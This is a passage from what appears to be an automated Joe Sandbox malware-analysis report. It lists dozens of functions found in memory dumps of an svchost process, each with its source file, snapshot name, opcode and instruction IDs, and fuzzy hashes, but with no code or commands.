                                                                    • Opcode Fuzzy Hash: 70fbe5085df62db58abeb74a83dbc6130bfd1ea51b24f32bc92266c704015fef
                                                                    • Instruction Fuzzy Hash: 81F0E5B5B48205DFDB018F15E954AAFBBB0FF16244F15009EDA0AD7352E6798D41CB10
                                                                    Function 076104F0 Relevance: .0, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2937502879.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7610000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5691edf2fd300171343fd37a94000ac298d722d585c85080a0ae34970a470bf4
                                                                    • Instruction ID: 20626996ae3e26babba9fccf9f0c0a6cc5d449e141d912c3986d76ebfc836eed
                                                                    • Opcode Fuzzy Hash: 5691edf2fd300171343fd37a94000ac298d722d585c85080a0ae34970a470bf4
                                                                    • Instruction Fuzzy Hash: 45E0867650A208BFC702DAA878004EABFBDDB5621170005E7D604D7211E9315B1453F1
                                                                    Function 075D0F48 Relevance: .0, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 520f67a79cdc452b5d99dac2c7f2b561dc66ed6458c85bbff21af490589931af
                                                                    • Instruction ID: 711c525b5baf1679bd5961254dc19f3c8344a603233d15a7be3cf5404834e94a
                                                                    • Opcode Fuzzy Hash: 520f67a79cdc452b5d99dac2c7f2b561dc66ed6458c85bbff21af490589931af
                                                                    • Instruction Fuzzy Hash: D8E04F763002145BC7109A4EE444DDABBADDFD8771B148037F608CB360CA71DC5286A4
                                                                    Function 017FC398 Relevance: .0, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9d55e1e605304809bd6e2baa79c0c12249ca0906c412b7a6fc05095e7e309efe
                                                                    • Instruction ID: d9c3a85549f0744653c10bc1b1ac1b4529ade28bd5d0e78323b6d2d099b7633a
                                                                    • Opcode Fuzzy Hash: 9d55e1e605304809bd6e2baa79c0c12249ca0906c412b7a6fc05095e7e309efe
                                                                    • Instruction Fuzzy Hash: 87E0863150A348AFC702CBB0EC0649E7FB9DB0712071106D7E846D3613EE324A0097D2
                                                                    Function 076C90A8 Relevance: .0, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2938537097.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_76c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 53c46fdccde31dbf0bb55e36fd6fc9f362c2ea6582f9c9a8448184d47df60820
                                                                    • Instruction ID: 62a2665f5d9fd88cb40303060e52e7022ff5ed67dc8dfb900cbdd28a6260ddb8
                                                                    • Opcode Fuzzy Hash: 53c46fdccde31dbf0bb55e36fd6fc9f362c2ea6582f9c9a8448184d47df60820
                                                                    • Instruction Fuzzy Hash: 12E048321093946FD7068A99E851CE77FB9DB46260704849BF944C7252C5729D11D7A1
                                                                    Function 076C90F0 Relevance: .0, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2938537097.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_76c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 75296fa251bebe3ef8eb68b541c971a59911eabb9fc1af2c3e3d4445cc1202d3
                                                                    • Instruction ID: 4be031c76f33af91908f1b6b1eff4d9abe279876218f8d0a98067f7ce5382999
                                                                    • Opcode Fuzzy Hash: 75296fa251bebe3ef8eb68b541c971a59911eabb9fc1af2c3e3d4445cc1202d3
                                                                    • Instruction Fuzzy Hash: 1DE02632B209049BC208B76DF8059DFB68EDBC8A12B00402B9A1AC7380CF3A9C15D3A1
                                                                    Function 076E0298 Relevance: .0, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2938880079.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_76e0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7de603f12eeb870f02b8d29d629ed7765b2782cfb5bd3ac9b753018753cfc1fd
                                                                    • Instruction ID: 7dcbbf5ecd8c082fbf04fc0395a5d58c11ef1a2dc41192b00be7413f21f63be0
                                                                    • Opcode Fuzzy Hash: 7de603f12eeb870f02b8d29d629ed7765b2782cfb5bd3ac9b753018753cfc1fd
                                                                    • Instruction Fuzzy Hash: 80E0D871509284DFC302CB20C45189ABFB5EF86318B1480EFD4098F273DA339A16D741
                                                                    Function 075DF1A8 Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bfbfd714361461859869a4474cbfaf889f9912476065aa3ce140380cef4c13b5
                                                                    • Instruction ID: 63762eef1ce9b0a4b0fcebd64c89b01e28efe2074c68cdbf4e3d28b69bad2206
                                                                    • Opcode Fuzzy Hash: bfbfd714361461859869a4474cbfaf889f9912476065aa3ce140380cef4c13b5
                                                                    • Instruction Fuzzy Hash: 04D05E72304312174615158EA8D84ABBACEE7C9665314003BE509C3300DD958C0662B1
                                                                    Function 076CA40A Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2938537097.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_76c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 791066fde428e83f0345b725f76ddca890538eeb68dedc7da133aef5301d0980
                                                                    • Instruction ID: c80d0596814149a8be6041597e2201cd99f51d1eea4dc4dbbc9f17e1dccb414b
                                                                    • Opcode Fuzzy Hash: 791066fde428e83f0345b725f76ddca890538eeb68dedc7da133aef5301d0980
                                                                    • Instruction Fuzzy Hash: 88E0C23220C2205FC306EA48F8108E6FBA1DBC6620705848FF94087351CA229C06C7F2
                                                                    Function 017FD6E0 Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 31443bf18cc674d0ae546c8fdaa8ecabf60990bf82c2bd6e6ae051be3af21acc
                                                                    • Instruction ID: f2a70120f4387ee03acd66c22fa53a13075f1e9ec03a5f8852f71e42267a78f5
                                                                    • Opcode Fuzzy Hash: 31443bf18cc674d0ae546c8fdaa8ecabf60990bf82c2bd6e6ae051be3af21acc
                                                                    • Instruction Fuzzy Hash: 55E04F7091424CEFCB60CEA8EC0865BB7A9E709351F10886AEA09C3241E6769650DB69
                                                                    Function 07611728 Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2937502879.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7610000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3050d876837b91eb55f68df180c9177773402ced53c30b82feb54016a51a13f2
                                                                    • Instruction ID: 3be6d86ae8057fee0e4435bcaecd222e06610c41b33d95287231f78daa8ea22c
                                                                    • Opcode Fuzzy Hash: 3050d876837b91eb55f68df180c9177773402ced53c30b82feb54016a51a13f2
                                                                    • Instruction Fuzzy Hash: A1E0126630D3804FC3469338AC785D2BF74DA8B16531980EFE985CB2A3D5629D46C761
                                                                    Function 0761B1D0 Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2937502879.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7610000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b681211086b745440b99706e94cbe47664df9f70798dd1c95d80af49df8d43b0
                                                                    • Instruction ID: 8fdd892c3fdcafe1636c534e247e4eeeba2a026a4ecaf37406b7419cdf6d58e5
                                                                    • Opcode Fuzzy Hash: b681211086b745440b99706e94cbe47664df9f70798dd1c95d80af49df8d43b0
                                                                    • Instruction Fuzzy Hash: 3DE086B2409288EFC702CFF8C451589BFFDDF46214B1441E7D509C7A22E9305A14DB91
                                                                    Function 07618008 Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2937502879.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7610000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 87b08593e93646f89f56b50b79b687ef2fb5d38f5dc14f56bef59d463ef5716a
                                                                    • Instruction ID: 069304b23a5fda2bf3da0a7069224ddbb3b5d8ac4975c13eba1d904d264d6398
                                                                    • Opcode Fuzzy Hash: 87b08593e93646f89f56b50b79b687ef2fb5d38f5dc14f56bef59d463ef5716a
                                                                    • Instruction Fuzzy Hash: 8EE04FB090510EEFCB50CE78ED09A9A77F9E7093A6F048862D906D3100E63ACA55EB51
                                                                    Function 0761798B Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2937502879.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7610000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3d1ae0aaf0022e4af33e20adde554db03702dc24ff443ff37ed975b608527432
                                                                    • Instruction ID: 188c99f03364ccbb6054a4ef1435b4273c30e84938692e2b7624e8f49ab9c447
                                                                    • Opcode Fuzzy Hash: 3d1ae0aaf0022e4af33e20adde554db03702dc24ff443ff37ed975b608527432
                                                                    • Instruction Fuzzy Hash: D1F032B5E00108CFDB00CF64D489AADFBB1FB85314F5880A6E21AAB322C73199468F10
                                                                    Function 075CFE7B Relevance: .0, Instructions: 21COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4b2d6169d65aff45f7175e99b861742126f6e8883e634a01c0bc477060337686
                                                                    • Instruction ID: c88c8069b570545121bc79610c771497675fe0592d048a190733dc8ada08c484
                                                                    • Opcode Fuzzy Hash: 4b2d6169d65aff45f7175e99b861742126f6e8883e634a01c0bc477060337686
                                                                    • Instruction Fuzzy Hash: CBE06D71A1024A8FDB14CFD4C550BDEBB72BF44304F208819C401AB299CB749D01CF40
                                                                    Function 076CE428 Relevance: .0, Instructions: 21COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2938537097.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_76c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5e27cc252325e582d83a175f9d72b0541391f27c14a7a23a5b0794f36a16063d
                                                                    • Instruction ID: eda97f8c62b6734260e6df570de16dd670dec4da228c55c3df36d4e5e4c6e5ad
                                                                    • Opcode Fuzzy Hash: 5e27cc252325e582d83a175f9d72b0541391f27c14a7a23a5b0794f36a16063d
                                                                    • Instruction Fuzzy Hash: 80D05E323092611FE302D218DC509E2FB75CFC6366B19C0BBE449CB656CA29DD03C3A0
                                                                    Function 07616070 Relevance: .0, Instructions: 21COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2937502879.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7610000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9c2e1973b151993ba76e685cf0069d255e94313138ab6bd8a7ab4fb2496ed5eb
                                                                    • Instruction ID: d11bfb0c49cc0016e0164e948dd0df989f2236a1a45adee6f60388d7941e9ece
                                                                    • Opcode Fuzzy Hash: 9c2e1973b151993ba76e685cf0069d255e94313138ab6bd8a7ab4fb2496ed5eb
                                                                    • Instruction Fuzzy Hash: F5E0EC763091908FC746DB28E991554B761AE8621532D849AD428CB256CF22EC13EA91
                                                                    Function 075DE4A3 Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 57b10d7b9076653774c5b34642ee0e33f19dea1b920ab226566f943261c95f23
                                                                    • Instruction ID: 3bab5578649c87b9f514bd9bd664e8b75809d38fccf5ebc5bce089bcd757dcd8
                                                                    • Opcode Fuzzy Hash: 57b10d7b9076653774c5b34642ee0e33f19dea1b920ab226566f943261c95f23
                                                                    • Instruction Fuzzy Hash: 6FD01276B041048FD740DA6CE4651DD3BF1EF49225B140496D905CB221EA215C108F90
                                                                    Function 075D5A31 Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 48d1933e95512dda7262d5c0643ee9f553f90cfd4bbc7f50222797997b6a7cfd
                                                                    • Instruction ID: 3f4c82d4c89bfb9d10d5bee733fc373555163caf22cbea47b1dbeeb86b83a168
                                                                    • Opcode Fuzzy Hash: 48d1933e95512dda7262d5c0643ee9f553f90cfd4bbc7f50222797997b6a7cfd
                                                                    • Instruction Fuzzy Hash: 15D02EB6300208EFAA699A04F8A1CBEBB2EFBC01F07205006F80249240CB220C12A650
                                                                    Function 076C6868 Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2938537097.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_76c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 37c4411ffb8f9fd93afe543d46d37e327ca149baf9b2a65a6958f38ed3ab9506
                                                                    • Instruction ID: 92a7cf2e2898dcca436b3d43f3d57af75f4c774eeb3189d76ab543073b2bebe6
                                                                    • Opcode Fuzzy Hash: 37c4411ffb8f9fd93afe543d46d37e327ca149baf9b2a65a6958f38ed3ab9506
                                                                    • Instruction Fuzzy Hash: 77E012F27202259BCA08F75CD4908AA37E6FFCC2543410AEADA4D5B765DE60AC0257DA
                                                                    Function 07616CF0 Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2937502879.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7610000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6b8ee43d3c3fa6f416a1d4e1c088873422a162d3e0f4f63d280e665d7c07b85d
                                                                    • Instruction ID: 3788c4d30465e4fccb67119455dcca04b76a85711fcb9b984a365ef54d2c1e26
                                                                    • Opcode Fuzzy Hash: 6b8ee43d3c3fa6f416a1d4e1c088873422a162d3e0f4f63d280e665d7c07b85d
                                                                    • Instruction Fuzzy Hash: 9AE0C2B9909688AFC741CFB4A9115DD7FF8EB4B21071044F7D54AC3213EA360A08A7A3
                                                                    Function 076E05E2 Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2938880079.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_76e0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bac5248b8a4171676b0d1dca862389a048f8145982356e4d60ccb095bb10edeb
                                                                    • Instruction ID: 30830ede07a34064b6f81f876d9bfce28bdb846f805d45fea4c7cbb35012c7f5
                                                                    • Opcode Fuzzy Hash: bac5248b8a4171676b0d1dca862389a048f8145982356e4d60ccb095bb10edeb
                                                                    • Instruction Fuzzy Hash: 8AD05BB5405144EFC742DFB499104EE7FF59F4521071512E7D405D7621E9310F08A791
                                                                    Function 07AEA9A8 Relevance: .0, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2939185926.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ad0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 105ab1cdedf106df822a4d7e601c058907160c9268b2a2c42dd4caaf31a4c207
                                                                    • Instruction ID: a8d0a56e9e34e4036c95ab77d48c104a8a749806fda4ddf6891a813418a72383
                                                                    • Opcode Fuzzy Hash: 105ab1cdedf106df822a4d7e601c058907160c9268b2a2c42dd4caaf31a4c207
                                                                    • Instruction Fuzzy Hash: 2CE09270E0520CAFCB44EFB8D44599DBBF5AB89300F0085A9A819A7350EA345A449F85
                                                                    Function 075C3368 Relevance: .0, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: be9bcf16d2a26478a081403d8ade3d691e1cc1d4a77c2626724ddd6e7cddf5f6
                                                                    • Instruction ID: 37a1ff6cac147a4359365f27cfb6605ea6a57df98bdf676e124360f7948e2ff6
                                                                    • Opcode Fuzzy Hash: be9bcf16d2a26478a081403d8ade3d691e1cc1d4a77c2626724ddd6e7cddf5f6
                                                                    • Instruction Fuzzy Hash: 5AD05E313092801FD302DA35C8154A9BFB1DF97150328C0AFE8C5C7253E9229D03C352
                                                                    Function 076C8E6A Relevance: .0, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2938537097.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_76c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cbd3319a11017c92cd70be7a3769b3e761849bad2784e85c450b0d5a2673a66c
                                                                    • Instruction ID: b307a5271634c318d961f3e4fb9c80937e8f8a7054f0f6d9916210229930a367
                                                                    • Opcode Fuzzy Hash: cbd3319a11017c92cd70be7a3769b3e761849bad2784e85c450b0d5a2673a66c
                                                                    • Instruction Fuzzy Hash: 8CD0127660D3506F9206D614D811CE6BBA5EBC6120715888FE484C7352DA52DC0687E2
                                                                    Function 017FD690 Relevance: .0, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cdc1ff29b35f9174f2c3a684ca5ea256461fbce52912680074223639833f0ce2
                                                                    • Instruction ID: 827cfbcfa7f2d80fb8380bea62082d20cea53a9aea556e6ad4e8c9c9c5328ea7
                                                                    • Opcode Fuzzy Hash: cdc1ff29b35f9174f2c3a684ca5ea256461fbce52912680074223639833f0ce2
                                                                    • Instruction Fuzzy Hash: 2CD0C22210E3895BCB1246B0AC494D9BF20DB032107281ACFD98182193D1612605D7A1
                                                                    Function 075DDF00 Relevance: .0, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 152f5a87d798646688401504eb417ff5ce1d20c2a6a9260de0b0991d37feb246
                                                                    • Instruction ID: b7ca2a47bcefc6851fc2eb26ad45a8ff5b5662c7ea7d392de59d8b08a23416a5
                                                                    • Opcode Fuzzy Hash: 152f5a87d798646688401504eb417ff5ce1d20c2a6a9260de0b0991d37feb246
                                                                    • Instruction Fuzzy Hash: ECD0223263E6340B8319123C78018C57FACC6529703210853E00CC7580D80BECC502E5
                                                                    Function 075DEA5A Relevance: .0, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 93bdddd33a0f6d59ead782fbb1777c15fc0858b85810f48ee23587aa7eecab7b
                                                                    • Instruction ID: 969ab3adaee68a16e39e2c914a9ad32e5d4ad2c3e293ccf7a0f9ed2ca5e76ecb
                                                                    • Opcode Fuzzy Hash: 93bdddd33a0f6d59ead782fbb1777c15fc0858b85810f48ee23587aa7eecab7b
                                                                    • Instruction Fuzzy Hash: D8D05EBA714014CFCF10AA6CE0964E83BA2FB8B521B1000AAD205DF660DF219D158740
                                                                    Function 075DEAA3 Relevance: .0, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4216a6c6a8cd653fb3c516ce1ea9fb6b5d109947e4fa07f860f714bac01759d1
                                                                    • Instruction ID: efbf0de0d4d592f6d1ed6e53590786fa98bc2afaa42aac149eff6c4f7dc67814
                                                                    • Opcode Fuzzy Hash: 4216a6c6a8cd653fb3c516ce1ea9fb6b5d109947e4fa07f860f714bac01759d1
                                                                    • Instruction Fuzzy Hash: E0D05EB1724014CFDF14976CE05A4E83BA2FF8A22275540AAD209DF661DF219C108B80
                                                                    Function 076CCD08 Relevance: .0, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2938537097.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_76c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a5843b5968ca54a417bdcdf1e918118a55c16e6f205340be5402496bcda91b9a
                                                                    • Instruction ID: 479e836560ffc931c4172ada81ef524b6bde4dbd2372a4a515f997f894d28694
                                                                    • Opcode Fuzzy Hash: a5843b5968ca54a417bdcdf1e918118a55c16e6f205340be5402496bcda91b9a
                                                                    • Instruction Fuzzy Hash: 4AD05E373092509FC201D659F4918D5FB70EED6272315C4ABE545CB6E2C6268986CBE1
                                                                    Function 076CA3D0 Relevance: .0, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2938537097.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_76c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 11bf99c983ec5114dc21b57bd58551917025ee0411ec92c605e95bb7832e0836
                                                                    • Instruction ID: 2640c31ffd9f26fcff5f6c61d60f71d9b9f25a9005fe1a8f1a2e0cb63dedba93
                                                                    • Opcode Fuzzy Hash: 11bf99c983ec5114dc21b57bd58551917025ee0411ec92c605e95bb7832e0836
                                                                    • Instruction Fuzzy Hash: A9E012B190910CEFCF01DFE8D94048EBBF9EF09200B1041E6D608C7151EE32AA149B91
                                                                    Function 017F2203 Relevance: .0, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bb8ada643c7020f86eedffb08d9d5e3210fe5ab76b04a1f34868758a67a0b589
                                                                    • Instruction ID: 66fe332d6ff45586af9cb9f9dcd16bb3bd25cbdab0f1792e3009297df1f21834
                                                                    • Opcode Fuzzy Hash: bb8ada643c7020f86eedffb08d9d5e3210fe5ab76b04a1f34868758a67a0b589
                                                                    • Instruction Fuzzy Hash: 38D06761D4930A9EDB80EFF9894636EBBF5BB19100F5445BE891DE2341FA318A124B92
                                                                    Function 017FC2A0 Relevance: .0, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
